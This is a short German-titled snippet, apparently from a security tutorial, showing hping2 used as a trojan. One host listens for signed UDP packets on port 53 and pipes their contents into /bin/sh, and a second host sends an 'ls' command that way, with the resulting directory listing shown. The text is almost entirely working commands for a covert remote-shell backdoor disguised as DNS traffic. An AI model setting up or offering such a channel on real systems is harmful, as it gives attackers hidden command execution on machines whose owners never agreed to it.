HPing2 im Einsatz als Trojaner

[root@localhost root]# hping 192.168.10.66 --listen signature --safe --udp -p 53 |/bin/sh
hping2 listen mode
amsn_received lib
readme.txt
anaconda-ks.cfg libfwbuilder-0.10.13-1.rh7.i386.rpm
report.html
avi license.txt
sbin
CPsrsc-50-02.i386.rpm linux-wlan-ng-0.1.16-pre5
scripts
...

on the other site

[root@knoppix root]# echo ls >test.cmd
[root@knoppix root]# hping 192.168.10.44 -p 53 -d 100 --udp --sign siganature --file ./test.cmd